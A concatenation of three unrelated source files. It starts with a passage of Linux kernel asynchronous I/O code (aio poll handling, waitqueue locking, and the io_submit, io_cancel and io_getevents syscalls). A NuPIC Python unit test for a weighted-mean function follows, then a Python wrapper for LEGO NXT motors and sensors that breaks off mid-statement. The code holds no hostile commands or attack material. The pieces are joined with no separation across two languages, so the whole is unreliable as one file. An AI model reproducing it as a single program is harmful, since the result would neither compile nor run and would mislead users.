	/* fsync takes no buffer/offset/flags; reject nonzero fields so
	 * they remain available for future extension. */
	if (unlikely(iocb->aio_buf || iocb->aio_offset || iocb->aio_nbytes ||
			iocb->aio_rw_flags))
		return -EINVAL;

	if (unlikely(!req->file->f_op->fsync))
		return -EINVAL;

	/* Snapshot the submitter's creds for use in the worker. */
	req->creds = prepare_creds();
	if (!req->creds)
		return -ENOMEM;

	req->datasync = datasync;
	INIT_WORK(&req->work, aio_fsync_work);
	schedule_work(&req->work);
	return 0;
}
/*
 * Deferred iocb_put() for poll requests completed from aio_poll_wake()
 * when signalling the eventfd is not allowed in the current context.
 */
static void aio_poll_put_work(struct work_struct *work)
{
	struct poll_iocb *req = container_of(work, struct poll_iocb, work);
	struct aio_kiocb *iocb = container_of(req, struct aio_kiocb, poll);

	iocb_put(iocb);
}
/*
 * Safely lock the waitqueue which the request is on, synchronizing with the
 * case where the ->poll() provider decides to free its waitqueue early.
 *
 * Returns true on success, meaning that req->head->lock was locked, req->wait
 * is on req->head, and an RCU read lock was taken.  Returns false if the
 * request was already removed from its waitqueue (which might no longer exist).
 */
static bool poll_iocb_lock_wq(struct poll_iocb *req)
{
	wait_queue_head_t *head;

	/*
	 * While we hold the waitqueue lock and the waitqueue is nonempty,
	 * wake_up_pollfree() will wait for us.  However, taking the waitqueue
	 * lock in the first place can race with the waitqueue being freed.
	 *
	 * We solve this as eventpoll does: by taking advantage of the fact that
	 * all users of wake_up_pollfree() will RCU-delay the actual free.  If
	 * we enter rcu_read_lock() and see that the pointer to the queue is
	 * non-NULL, we can then lock it without the memory being freed out from
	 * under us, then check whether the request is still on the queue.
	 *
	 * Keep holding rcu_read_lock() as long as we hold the queue lock, in
	 * case the caller deletes the entry from the queue, leaving it empty.
	 * In that case, only RCU prevents the queue memory from being freed.
	 */
	rcu_read_lock();
	/* Pairs with smp_store_release(&req->head, NULL) in aio_poll_wake()
	 * on the POLLFREE path. */
	head = smp_load_acquire(&req->head);
	if (head) {
		spin_lock(&head->lock);
		/* Success path returns with head->lock held AND inside the
		 * RCU read-side section; poll_iocb_unlock_wq() undoes both. */
		if (!list_empty(&req->wait.entry))
			return true;
		spin_unlock(&head->lock);
	}
	rcu_read_unlock();
	return false;
}
/* Undo a successful poll_iocb_lock_wq(): drop the queue lock, then RCU. */
static void poll_iocb_unlock_wq(struct poll_iocb *req)
{
	spin_unlock(&req->head->lock);
	rcu_read_unlock();
}
/*
 * Workqueue function that finishes an IOCB_CMD_POLL request: re-evaluates
 * the file's poll state (unless the request was cancelled), and either
 * completes the iocb or goes back to waiting if no event is ready yet.
 */
static void aio_poll_complete_work(struct work_struct *work)
{
	struct poll_iocb *req = container_of(work, struct poll_iocb, work);
	struct aio_kiocb *iocb = container_of(req, struct aio_kiocb, poll);
	struct poll_table_struct pt = { ._key = req->events };
	struct kioctx *ctx = iocb->ki_ctx;
	__poll_t mask = 0;

	/* Cancelled requests complete with mask == 0; otherwise query the
	 * current readiness (pt has no _qproc, so nothing is re-queued). */
	if (!READ_ONCE(req->cancelled))
		mask = vfs_poll(req->file, &pt) & req->events;

	/*
	 * Note that ->ki_cancel callers also delete iocb from active_reqs after
	 * calling ->ki_cancel.  We need the ctx_lock roundtrip here to
	 * synchronize with them.  In the cancellation case the list_del_init
	 * itself is not actually needed, but harmless so we keep it in to
	 * avoid further branches in the fast path.
	 */
	spin_lock_irq(&ctx->ctx_lock);
	if (poll_iocb_lock_wq(req)) {
		if (!mask && !READ_ONCE(req->cancelled)) {
			/*
			 * The request isn't actually ready to be completed yet.
			 * Reschedule completion if another wakeup came in.
			 */
			if (req->work_need_resched) {
				schedule_work(&req->work);
				req->work_need_resched = false;
			} else {
				req->work_scheduled = false;
			}
			poll_iocb_unlock_wq(req);
			spin_unlock_irq(&ctx->ctx_lock);
			return;
		}
		list_del_init(&req->wait.entry);
		poll_iocb_unlock_wq(req);
	} /* else, POLLFREE has freed the waitqueue, so we must complete */
	list_del_init(&iocb->ki_list);
	iocb->ki_res.res = mangle_poll(mask);
	spin_unlock_irq(&ctx->ctx_lock);

	iocb_put(iocb);
}
/* assumes we are called with irqs disabled */
/*
 * ->ki_cancel handler for poll requests: mark the request cancelled and
 * make sure the completion work is scheduled to finish it.
 */
static int aio_poll_cancel(struct kiocb *iocb)
{
	struct aio_kiocb *aiocb = container_of(iocb, struct aio_kiocb, rw);
	struct poll_iocb *req = &aiocb->poll;

	if (poll_iocb_lock_wq(req)) {
		WRITE_ONCE(req->cancelled, true);
		/* work_scheduled is protected by the waitqueue lock here. */
		if (!req->work_scheduled) {
			schedule_work(&aiocb->poll.work);
			req->work_scheduled = true;
		}
		poll_iocb_unlock_wq(req);
	} /* else, the request was force-cancelled by POLLFREE already */

	return 0;
}
/*
 * Wait-queue wakeup callback for poll requests.  Completes the request
 * inline when possible; otherwise defers to aio_poll_complete_work().
 * Called with the waitqueue lock held (hence the trylock on ctx_lock).
 */
static int aio_poll_wake(struct wait_queue_entry *wait, unsigned mode, int sync,
		void *key)
{
	struct poll_iocb *req = container_of(wait, struct poll_iocb, wait);
	struct aio_kiocb *iocb = container_of(req, struct aio_kiocb, poll);
	__poll_t mask = key_to_poll(key);
	unsigned long flags;

	/* for instances that support it check for an event match first: */
	if (mask && !(mask & req->events))
		return 0;

	/*
	 * Complete the request inline if possible.  This requires that three
	 * conditions be met:
	 *   1. An event mask must have been passed.  If a plain wakeup was done
	 *      instead, then mask == 0 and we have to call vfs_poll() to get
	 *      the events, so inline completion isn't possible.
	 *   2. The completion work must not have already been scheduled.
	 *   3. ctx_lock must not be busy.  We have to use trylock because we
	 *      already hold the waitqueue lock, so this inverts the normal
	 *      locking order.  Use irqsave/irqrestore because not all
	 *      filesystems (e.g. fuse) call this function with IRQs disabled,
	 *      yet IRQs have to be disabled before ctx_lock is obtained.
	 */
	if (mask && !req->work_scheduled &&
	    spin_trylock_irqsave(&iocb->ki_ctx->ctx_lock, flags)) {
		struct kioctx *ctx = iocb->ki_ctx;

		list_del_init(&req->wait.entry);
		list_del(&iocb->ki_list);
		iocb->ki_res.res = mangle_poll(mask);
		/* eventfd_signal() may not be safe here; punt the final
		 * iocb_put() (which signals it) to a workqueue. */
		if (iocb->ki_eventfd && !eventfd_signal_allowed()) {
			iocb = NULL;
			INIT_WORK(&req->work, aio_poll_put_work);
			schedule_work(&req->work);
		}
		spin_unlock_irqrestore(&ctx->ctx_lock, flags);
		if (iocb)
			iocb_put(iocb);
	} else {
		/*
		 * Schedule the completion work if needed.  If it was already
		 * scheduled, record that another wakeup came in.
		 *
		 * Don't remove the request from the waitqueue here, as it might
		 * not actually be complete yet (we won't know until vfs_poll()
		 * is called), and we must not miss any wakeups.  POLLFREE is an
		 * exception to this; see below.
		 */
		if (req->work_scheduled) {
			req->work_need_resched = true;
		} else {
			schedule_work(&req->work);
			req->work_scheduled = true;
		}

		/*
		 * If the waitqueue is being freed early but we can't complete
		 * the request inline, we have to tear down the request as best
		 * we can.  That means immediately removing the request from its
		 * waitqueue and preventing all further accesses to the
		 * waitqueue via the request.  We also need to schedule the
		 * completion work (done above).  Also mark the request as
		 * cancelled, to potentially skip an unneeded call to ->poll().
		 */
		if (mask & POLLFREE) {
			WRITE_ONCE(req->cancelled, true);
			list_del_init(&req->wait.entry);

			/*
			 * Careful: this *must* be the last step, since as soon
			 * as req->head is NULL'ed out, the request can be
			 * completed and freed, since aio_poll_complete_work()
			 * will no longer need to take the waitqueue lock.
			 */
			smp_store_release(&req->head, NULL);
		}
	}
	return 1;
}
/*
 * poll_table wrapper passed to vfs_poll() during aio_poll() submission;
 * aio_poll_queue_proc() records whether/where the request was queued.
 */
struct aio_poll_table {
	struct poll_table_struct	pt;
	struct aio_kiocb		*iocb;
	bool				queued;	/* wait entry added to a queue */
	int				error;	/* -EINVAL on multi-queue files */
};
/*
 * poll_table queue callback invoked by the file's ->poll(): attach the
 * request's wait entry to the file's waitqueue.  aio poll supports at
 * most one waitqueue per file.
 */
static void
aio_poll_queue_proc(struct file *file, struct wait_queue_head *head,
		struct poll_table_struct *p)
{
	struct aio_poll_table *pt = container_of(p, struct aio_poll_table, pt);

	/* multiple wait queues per file are not supported */
	if (unlikely(pt->queued)) {
		pt->error = -EINVAL;
		return;
	}

	pt->queued = true;
	pt->error = 0;
	pt->iocb->poll.head = head;
	add_wait_queue(head, &pt->iocb->poll.wait);
}
/*
 * Submit an IOCB_CMD_POLL request: register on the file's waitqueue via
 * vfs_poll() and either complete synchronously (event already pending or
 * error) or leave the request armed for aio_poll_wake().  Returns 0 on
 * successful async submission or inline completion, negative error
 * otherwise.
 */
static int aio_poll(struct aio_kiocb *aiocb, const struct iocb *iocb)
{
	struct kioctx *ctx = aiocb->ki_ctx;
	struct poll_iocb *req = &aiocb->poll;
	struct aio_poll_table apt;
	bool cancel = false;
	__poll_t mask;

	/* reject any unknown events outside the normal event mask. */
	if ((u16)iocb->aio_buf != iocb->aio_buf)
		return -EINVAL;
	/* reject fields that are not defined for poll */
	if (iocb->aio_offset || iocb->aio_nbytes || iocb->aio_rw_flags)
		return -EINVAL;

	INIT_WORK(&req->work, aio_poll_complete_work);
	/* Errors and hangup are always reported, as with poll(2). */
	req->events = demangle_poll(iocb->aio_buf) | EPOLLERR | EPOLLHUP;

	req->head = NULL;
	req->cancelled = false;
	req->work_scheduled = false;
	req->work_need_resched = false;

	apt.pt._qproc = aio_poll_queue_proc;
	apt.pt._key = req->events;
	apt.iocb = aiocb;
	apt.queued = false;
	apt.error = -EINVAL; /* same as no support for IOCB_CMD_POLL */

	/* initialized the list so that we can do list_empty checks */
	INIT_LIST_HEAD(&req->wait.entry);
	init_waitqueue_func_entry(&req->wait, aio_poll_wake);

	/* This may queue the wait entry AND may fire aio_poll_wake()
	 * concurrently; the state is sorted out under ctx_lock below. */
	mask = vfs_poll(req->file, &apt.pt) & req->events;
	spin_lock_irq(&ctx->ctx_lock);
	if (likely(apt.queued)) {
		bool on_queue = poll_iocb_lock_wq(req);

		if (!on_queue || req->work_scheduled) {
			/*
			 * aio_poll_wake() already either scheduled the async
			 * completion work, or completed the request inline.
			 */
			if (apt.error) /* unsupported case: multiple queues */
				cancel = true;
			apt.error = 0;
			mask = 0;
		}
		if (mask || apt.error) {
			/* Steal to complete synchronously. */
			list_del_init(&req->wait.entry);
		} else if (cancel) {
			/* Cancel if possible (may be too late though). */
			WRITE_ONCE(req->cancelled, true);
		} else if (on_queue) {
			/*
			 * Actually waiting for an event, so add the request to
			 * active_reqs so that it can be cancelled if needed.
			 */
			list_add_tail(&aiocb->ki_list, &ctx->active_reqs);
			aiocb->ki_cancel = aio_poll_cancel;
		}
		if (on_queue)
			poll_iocb_unlock_wq(req);
	}
	if (mask) { /* no async, we'd stolen it */
		aiocb->ki_res.res = mangle_poll(mask);
		apt.error = 0;
	}
	spin_unlock_irq(&ctx->ctx_lock);
	if (mask)
		iocb_put(aiocb);
	return apt.error;
}
/*
 * Fill in the common fields of an aio request from the (already copied-in)
 * userspace iocb and dispatch to the opcode-specific handler.  References
 * taken here (file, eventfd) stay attached to *req; on error the caller
 * tears the request down (see io_submit_one()).
 */
static int __io_submit_one(struct kioctx *ctx, const struct iocb *iocb,
			   struct iocb __user *user_iocb, struct aio_kiocb *req,
			   bool compat)
{
	req->ki_filp = fget(iocb->aio_fildes);
	if (unlikely(!req->ki_filp))
		return -EBADF;

	if (iocb->aio_flags & IOCB_FLAG_RESFD) {
		struct eventfd_ctx *eventfd;
		/*
		 * If the IOCB_FLAG_RESFD flag of aio_flags is set, get an
		 * instance of the file* now. The file descriptor must be
		 * an eventfd() fd, and will be signaled for each completed
		 * event using the eventfd_signal() function.
		 */
		eventfd = eventfd_ctx_fdget(iocb->aio_resfd);
		if (IS_ERR(eventfd))
			return PTR_ERR(eventfd);

		req->ki_eventfd = eventfd;
	}

	/* Stamp the userspace iocb (also validates the pointer is writable). */
	if (unlikely(put_user(KIOCB_KEY, &user_iocb->aio_key))) {
		pr_debug("EFAULT: aio_key\n");
		return -EFAULT;
	}

	req->ki_res.obj = (u64)(unsigned long)user_iocb;
	req->ki_res.data = iocb->aio_data;
	req->ki_res.res = 0;
	req->ki_res.res2 = 0;

	switch (iocb->aio_lio_opcode) {
	case IOCB_CMD_PREAD:
		return aio_read(&req->rw, iocb, false, compat);
	case IOCB_CMD_PWRITE:
		return aio_write(&req->rw, iocb, false, compat);
	case IOCB_CMD_PREADV:
		return aio_read(&req->rw, iocb, true, compat);
	case IOCB_CMD_PWRITEV:
		return aio_write(&req->rw, iocb, true, compat);
	case IOCB_CMD_FSYNC:
		return aio_fsync(&req->fsync, iocb, false);
	case IOCB_CMD_FDSYNC:
		return aio_fsync(&req->fsync, iocb, true);
	case IOCB_CMD_POLL:
		return aio_poll(req, iocb);
	default:
		pr_debug("invalid aio operation %d\n", iocb->aio_lio_opcode);
		return -EINVAL;
	}
}
/*
 * Copy one iocb in from userspace, validate it, allocate an aio_kiocb and
 * submit it via __io_submit_one().  On failure the request and its
 * reserved ring slot are released here.
 */
static int io_submit_one(struct kioctx *ctx, struct iocb __user *user_iocb,
			 bool compat)
{
	struct aio_kiocb *req;
	struct iocb iocb;
	int err;

	if (unlikely(copy_from_user(&iocb, user_iocb, sizeof(iocb))))
		return -EFAULT;

	/* enforce forwards compatibility on users */
	if (unlikely(iocb.aio_reserved2)) {
		pr_debug("EINVAL: reserve field set\n");
		return -EINVAL;
	}

	/* prevent overflows */
	if (unlikely(
	    (iocb.aio_buf != (unsigned long)iocb.aio_buf) ||
	    (iocb.aio_nbytes != (size_t)iocb.aio_nbytes) ||
	    ((ssize_t)iocb.aio_nbytes < 0)
	   )) {
		pr_debug("EINVAL: overflow check\n");
		return -EINVAL;
	}

	req = aio_get_req(ctx);
	if (unlikely(!req))
		return -EAGAIN;

	err = __io_submit_one(ctx, &iocb, user_iocb, req, compat);

	/* Done with the synchronous reference */
	iocb_put(req);

	/*
	 * If err is 0, we'd either done aio_complete() ourselves or have
	 * arranged for that to be done asynchronously. Anything non-zero
	 * means that we need to destroy req ourselves.
	 */
	if (unlikely(err)) {
		iocb_destroy(req);
		put_reqs_available(ctx, 1);
	}
	return err;
}
/* sys_io_submit:
* Queue the nr iocbs pointed to by iocbpp for processing. Returns
* the number of iocbs queued. May return -EINVAL if the aio_context
* specified by ctx_id is invalid, if nr is < 0, if the iocb at
* *iocbpp[0] is not properly initialized, if the operation specified
* is invalid for the file descriptor in the iocb. May fail with
* -EFAULT if any of the data structures point to invalid data. May
* fail with -EBADF if the file descriptor specified in the first
* iocb is invalid. May fail with -EAGAIN if insufficient resources
* are available to queue any iocbs. Will return 0 if nr is 0. Will
* fail with -ENOSYS if not implemented.
*/
SYSCALL_DEFINE3(io_submit, aio_context_t, ctx_id, long, nr,
		struct iocb __user * __user *, iocbpp)
{
	struct kioctx *ctx;
	long ret = 0;
	int i = 0;
	struct blk_plug plug;

	if (unlikely(nr < 0))
		return -EINVAL;

	ctx = lookup_ioctx(ctx_id);
	if (unlikely(!ctx)) {
		pr_debug("EINVAL: invalid context id\n");
		return -EINVAL;
	}

	/* Never take more submissions than the completion ring can hold. */
	if (nr > ctx->nr_events)
		nr = ctx->nr_events;

	/* Plug the block layer only when the batch is big enough to pay off. */
	if (nr > AIO_PLUG_THRESHOLD)
		blk_start_plug(&plug);
	for (i = 0; i < nr; i++) {
		struct iocb __user *user_iocb;

		if (unlikely(get_user(user_iocb, iocbpp + i))) {
			ret = -EFAULT;
			break;
		}

		ret = io_submit_one(ctx, user_iocb, false);
		if (ret)
			break;
	}
	if (nr > AIO_PLUG_THRESHOLD)
		blk_finish_plug(&plug);

	percpu_ref_put(&ctx->users);
	/* Partial success reports how many were queued; errors only if none. */
	return i ? i : ret;
}
#ifdef CONFIG_COMPAT
/*
 * Compat entry point: identical to io_submit() except that the iocb
 * pointer array holds 32-bit userspace pointers.
 */
COMPAT_SYSCALL_DEFINE3(io_submit, compat_aio_context_t, ctx_id,
		       int, nr, compat_uptr_t __user *, iocbpp)
{
	struct kioctx *ctx;
	long ret = 0;
	int i = 0;
	struct blk_plug plug;

	if (unlikely(nr < 0))
		return -EINVAL;

	ctx = lookup_ioctx(ctx_id);
	if (unlikely(!ctx)) {
		pr_debug("EINVAL: invalid context id\n");
		return -EINVAL;
	}

	/* Never take more submissions than the completion ring can hold. */
	if (nr > ctx->nr_events)
		nr = ctx->nr_events;

	/* Plug the block layer only when the batch is big enough to pay off. */
	if (nr > AIO_PLUG_THRESHOLD)
		blk_start_plug(&plug);
	for (i = 0; i < nr; i++) {
		compat_uptr_t user_iocb;

		if (unlikely(get_user(user_iocb, iocbpp + i))) {
			ret = -EFAULT;
			break;
		}

		ret = io_submit_one(ctx, compat_ptr(user_iocb), true);
		if (ret)
			break;
	}
	if (nr > AIO_PLUG_THRESHOLD)
		blk_finish_plug(&plug);

	percpu_ref_put(&ctx->users);
	/* Partial success reports how many were queued; errors only if none. */
	return i ? i : ret;
}
#endif
/* sys_io_cancel:
* Attempts to cancel an iocb previously passed to io_submit. If
* the operation is successfully cancelled, the resulting event is
* copied into the memory pointed to by result without being placed
* into the completion queue and 0 is returned. May fail with
* -EFAULT if any of the data structures pointed to are invalid.
* May fail with -EINVAL if aio_context specified by ctx_id is
* invalid. May fail with -EAGAIN if the iocb specified was not
* cancelled. Will fail with -ENOSYS if not implemented.
*/
SYSCALL_DEFINE3(io_cancel, aio_context_t, ctx_id, struct iocb __user *, iocb,
		struct io_event __user *, result)
{
	struct kioctx *ctx;
	struct aio_kiocb *kiocb;
	int ret = -EINVAL;
	u32 key;
	u64 obj = (u64)(unsigned long)iocb;

	if (unlikely(get_user(key, &iocb->aio_key)))
		return -EFAULT;
	/* aio_key is stamped with KIOCB_KEY at submit time; anything else is bogus */
	if (unlikely(key != KIOCB_KEY))
		return -EINVAL;

	ctx = lookup_ioctx(ctx_id);
	if (unlikely(!ctx))
		return -EINVAL;

	spin_lock_irq(&ctx->ctx_lock);
	/* Find the in-flight request by its userspace iocb pointer. */
	list_for_each_entry(kiocb, &ctx->active_reqs, ki_list) {
		if (kiocb->ki_res.obj == obj) {
			ret = kiocb->ki_cancel(&kiocb->rw);
			list_del_init(&kiocb->ki_list);
			break;
		}
	}
	spin_unlock_irq(&ctx->ctx_lock);

	if (!ret) {
		/*
		 * The result argument is no longer used - the io_event is
		 * always delivered via the ring buffer. -EINPROGRESS indicates
		 * cancellation is in progress:
		 */
		ret = -EINPROGRESS;
	}

	percpu_ref_put(&ctx->users);

	return ret;
}
/*
 * Common worker for all io_getevents() entry points: look up the context,
 * validate the (min_nr, nr) window and read completion events, waiting at
 * most until *ts (forever when ts is NULL).
 */
static long do_io_getevents(aio_context_t ctx_id,
		long min_nr,
		long nr,
		struct io_event __user *events,
		struct timespec64 *ts)
{
	struct kioctx *ioctx;
	ktime_t until;
	long ret;

	ioctx = lookup_ioctx(ctx_id);
	if (unlikely(!ioctx))
		return -EINVAL;

	until = ts ? timespec64_to_ktime(*ts) : KTIME_MAX;
	ret = -EINVAL;
	if (likely(min_nr >= 0 && min_nr <= nr))
		ret = read_events(ioctx, min_nr, nr, events, until);
	percpu_ref_put(&ioctx->users);
	return ret;
}
/* io_getevents:
* Attempts to read at least min_nr events and up to nr events from
* the completion queue for the aio_context specified by ctx_id. If
* it succeeds, the number of read events is returned. May fail with
* -EINVAL if ctx_id is invalid, if min_nr is out of range, if nr is
* out of range, if timeout is out of range. May fail with -EFAULT
* if any of the memory specified is invalid. May return 0 or
* < min_nr if the timeout specified by timeout has elapsed
* before sufficient events are available, where timeout == NULL
* specifies an infinite timeout. Note that the timeout pointed to by
* timeout is relative. Will fail with -ENOSYS if not implemented.
*/
#ifdef CONFIG_64BIT

/* Native 64-bit entry point: copy in the relative timeout and delegate. */
SYSCALL_DEFINE5(io_getevents, aio_context_t, ctx_id,
		long, min_nr,
		long, nr,
		struct io_event __user *, events,
		struct __kernel_timespec __user *, timeout)
{
	struct timespec64	ts;
	int			ret;

	if (timeout && unlikely(get_timespec64(&ts, timeout)))
		return -EFAULT;

	ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &ts : NULL);
	/* A pending signal with no events delivered becomes -EINTR. */
	if (!ret && signal_pending(current))
		ret = -EINTR;
	return ret;
}

#endif
/* Userspace layout of the io_pgetevents() signal-mask argument. */
struct __aio_sigset {
	const sigset_t __user	*sigmask;
	size_t			sigsetsize;
};
/*
 * Like io_getevents() but, ppoll()-style, temporarily installs the
 * caller-supplied signal mask for the duration of the wait.
 */
SYSCALL_DEFINE6(io_pgetevents,
		aio_context_t, ctx_id,
		long, min_nr,
		long, nr,
		struct io_event __user *, events,
		struct __kernel_timespec __user *, timeout,
		const struct __aio_sigset __user *, usig)
{
	struct __aio_sigset	ksig = { NULL, };
	struct timespec64	ts;
	bool interrupted;
	int ret;

	if (timeout && unlikely(get_timespec64(&ts, timeout)))
		return -EFAULT;

	if (usig && copy_from_user(&ksig, usig, sizeof(ksig)))
		return -EFAULT;

	ret = set_user_sigmask(ksig.sigmask, ksig.sigsetsize);
	if (ret)
		return ret;

	ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &ts : NULL);

	interrupted = signal_pending(current);
	/* Keep the temporary mask in place while the signal gets delivered. */
	restore_saved_sigmask_unless(interrupted);
	if (interrupted && !ret)
		ret = -ERESTARTNOHAND;

	return ret;
}
#if defined(CONFIG_COMPAT_32BIT_TIME) && !defined(CONFIG_64BIT)

/* 32-bit-timespec variant of io_pgetevents() for 32-bit native kernels. */
SYSCALL_DEFINE6(io_pgetevents_time32,
		aio_context_t, ctx_id,
		long, min_nr,
		long, nr,
		struct io_event __user *, events,
		struct old_timespec32 __user *, timeout,
		const struct __aio_sigset __user *, usig)
{
	struct __aio_sigset	ksig = { NULL, };
	struct timespec64	ts;
	bool interrupted;
	int ret;

	if (timeout && unlikely(get_old_timespec32(&ts, timeout)))
		return -EFAULT;

	if (usig && copy_from_user(&ksig, usig, sizeof(ksig)))
		return -EFAULT;

	ret = set_user_sigmask(ksig.sigmask, ksig.sigsetsize);
	if (ret)
		return ret;

	ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &ts : NULL);

	interrupted = signal_pending(current);
	/* Keep the temporary mask in place while the signal gets delivered. */
	restore_saved_sigmask_unless(interrupted);
	if (interrupted && !ret)
		ret = -ERESTARTNOHAND;

	return ret;
}

#endif
#if defined(CONFIG_COMPAT_32BIT_TIME)

/* 32-bit-timespec variant of io_getevents(), no signal mask. */
SYSCALL_DEFINE5(io_getevents_time32, __u32, ctx_id,
		__s32, min_nr,
		__s32, nr,
		struct io_event __user *, events,
		struct old_timespec32 __user *, timeout)
{
	struct timespec64 t;
	int ret;

	if (timeout && get_old_timespec32(&t, timeout))
		return -EFAULT;

	ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &t : NULL);
	/* A pending signal with no events delivered becomes -EINTR. */
	if (!ret && signal_pending(current))
		ret = -EINTR;
	return ret;
}

#endif
#ifdef CONFIG_COMPAT

/* 32-bit userspace layout of the io_pgetevents() signal-mask argument. */
struct __compat_aio_sigset {
	compat_uptr_t		sigmask;
	compat_size_t		sigsetsize;
};
#if defined(CONFIG_COMPAT_32BIT_TIME)

/* Compat io_pgetevents(): 32-bit pointers, 32-bit timespec. */
COMPAT_SYSCALL_DEFINE6(io_pgetevents,
		       compat_aio_context_t, ctx_id,
		       compat_long_t, min_nr,
		       compat_long_t, nr,
		       struct io_event __user *, events,
		       struct old_timespec32 __user *, timeout,
		       const struct __compat_aio_sigset __user *, usig)
{
	struct __compat_aio_sigset ksig = { 0, };
	struct timespec64 t;
	bool interrupted;
	int ret;

	if (timeout && get_old_timespec32(&t, timeout))
		return -EFAULT;

	if (usig && copy_from_user(&ksig, usig, sizeof(ksig)))
		return -EFAULT;

	ret = set_compat_user_sigmask(compat_ptr(ksig.sigmask), ksig.sigsetsize);
	if (ret)
		return ret;

	ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &t : NULL);

	interrupted = signal_pending(current);
	/* Keep the temporary mask in place while the signal gets delivered. */
	restore_saved_sigmask_unless(interrupted);
	if (interrupted && !ret)
		ret = -ERESTARTNOHAND;

	return ret;
}

#endif
/* Compat io_pgetevents(): 32-bit pointers, 64-bit timespec. */
COMPAT_SYSCALL_DEFINE6(io_pgetevents_time64,
		       compat_aio_context_t, ctx_id,
		       compat_long_t, min_nr,
		       compat_long_t, nr,
		       struct io_event __user *, events,
		       struct __kernel_timespec __user *, timeout,
		       const struct __compat_aio_sigset __user *, usig)
{
	struct __compat_aio_sigset ksig = { 0, };
	struct timespec64 t;
	bool interrupted;
	int ret;

	if (timeout && get_timespec64(&t, timeout))
		return -EFAULT;

	if (usig && copy_from_user(&ksig, usig, sizeof(ksig)))
		return -EFAULT;

	ret = set_compat_user_sigmask(compat_ptr(ksig.sigmask), ksig.sigsetsize);
	if (ret)
		return ret;

	ret = do_io_getevents(ctx_id, min_nr, nr, events, timeout ? &t : NULL);

	interrupted = signal_pending(current);
	/* Keep the temporary mask in place while the signal gets delivered. */
	restore_saved_sigmask_unless(interrupted);
	if (interrupted && !ret)
		ret = -ERESTARTNOHAND;

	return ret;
}
#endif
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Unit tests for aggregator module."""
import unittest2 as unittest
from nupic.data import aggregator
class AggregatorTest(unittest.TestCase):
  """Unit tests for misc. aggregator functions."""

  def testFixAggregationDict(self):
    """Exercise _aggr_weighted_mean over a table of value/weight cases."""
    # Each entry: (values, weights, expected weighted mean).
    cases = (
        # Simplest case.
        ((1.0, 1.0), (1, 1), 1.0),
        # Simple non-uniform case.
        ((1.0, 2.0), (1, 2), 5.0 / 3.0),
        # Make sure it handles integer values as integers.
        ((1, 2), (1, 2), 1),
        # More-than-two case.
        ((1.0, 2.0, 3.0), (1, 2, 3), 14.0 / 6.0),
        # Handle zeros.
        ((1.0, 0.0, 3.0), (1, 2, 3), 10.0 / 6.0),
        # Handle negative numbers.
        ((1.0, -2.0, 3.0), (1, 2, 3), 1.0),
    )
    for values, weights, expected in cases:
      result = aggregator._aggr_weighted_mean(values, weights)
      self.assertAlmostEqual(result, expected, places=7)
if __name__ == '__main__':
  unittest.main()
import lightblue
from nxt import Motor, find_one_brick, PORT_A, PORT_B, PORT_C, PORT_1, PORT_2, PORT_3, PORT_4
from nxt.sensor import Touch, Sound, Ultrasonic, Light
from time import sleep
class PortMap(dict):
    """Lazy port -> device mapping.

    Devices are created on first access by calling ``factory(port)`` and
    cached in the dict; accessing a port outside ``ports`` raises
    ``ValueError``.
    """

    def __init__(self, ports, factory):
        # factory: callable taking a port key and returning the device object.
        self.factory = factory
        # ports: collection of valid port keys (strings or ints).
        self.ports = ports

    def __missing__(self, port):
        """Create, cache and return the device for a not-yet-seen port."""
        if port in self.ports:
            self[port] = self.factory(port)
            return self[port]
        # map(str, ...) so non-string port keys (e.g. the integer sensor
        # ports used elsewhere in this file) format without a TypeError;
        # matches NXTBrick.add_sensor's error formatting.
        raise ValueError("{} is an invalid port; must be one of {}".format(
            port, ", ".join(map(str, self.ports))))
class NXTBrick():
    """Convenience wrapper around a single LEGO NXT brick.

    Motors are addressed by the labels "a"-"c" and sensors by the port
    numbers 1-4, matching the markings on the brick itself.
    """

    # Motor port labels -> nxt port constants.
    motorPorts = {
        "a": PORT_A,
        "b": PORT_B,
        "c": PORT_C
    }
    # Sensor port numbers -> nxt port constants.
    sensorPorts = {
        1: PORT_1,
        2: PORT_2,
        3: PORT_3,
        4: PORT_4
    }
    # Supported sensor type names -> nxt sensor classes ('none' detaches).
    sensorTypes = {
        "none": None,
        "touch": Touch,
        "sound": Sound,
        "ultrasonic": Ultrasonic,
        "light": Light
    }

    def __init__(self):
        # Connect to the first brick discovered.
        self.brick = find_one_brick()
        # Motor objects are created lazily, one per port, on first use.
        self.motors = PortMap(self.motorPorts.keys(), self._motor_factory())
        self.sensors = {}

    def roll(self, port, power):
        """Run the motor on `port` at `power`, clamped to [-100, 100]."""
        self.motors[port].run(max(-100, min(100, power)))

    def halt(self, port):
        """Brake the motor on `port`, then release it to idle."""
        self.motors[port].brake()
        sleep(0.2)  # let the brake take effect before idling
        self.motors[port].idle()

    def read_sensor(self, port):
        """Return the integer sample for `port`, or the string "None" if
        no sensor is attached there."""
        if port in self.sensors:
            return int(self.sensors[port].get_sample())
        return "None"

    def read_sensors(self):
        """Return {port: sample} for all four sensor ports."""
        return {i: self.read_sensor(i) for i in self.sensorPorts.keys()}

    def _motor_factory(self):
        # Factory handed to the lazy PortMap to build Motor objects on demand.
        def create_motor(port):
            return Motor(self.brick, self.motorPorts[port])
        return create_motor

    def add_sensor(self, port, sensorType):
        """Attach a sensor of `sensorType` to `port` ('none' detaches).

        Raises ValueError for an unknown port or sensor type.
        """
        if port not in self.sensorPorts:
            raise ValueError("{} is an invalid sensor port; must be in {}".format(
                port, ", ".join(map(str, self.sensorPorts.keys()))))
        if sensorType not in self.sensorTypes:
            raise ValueError("{} is an invalid sensor type; must be in {}".format(
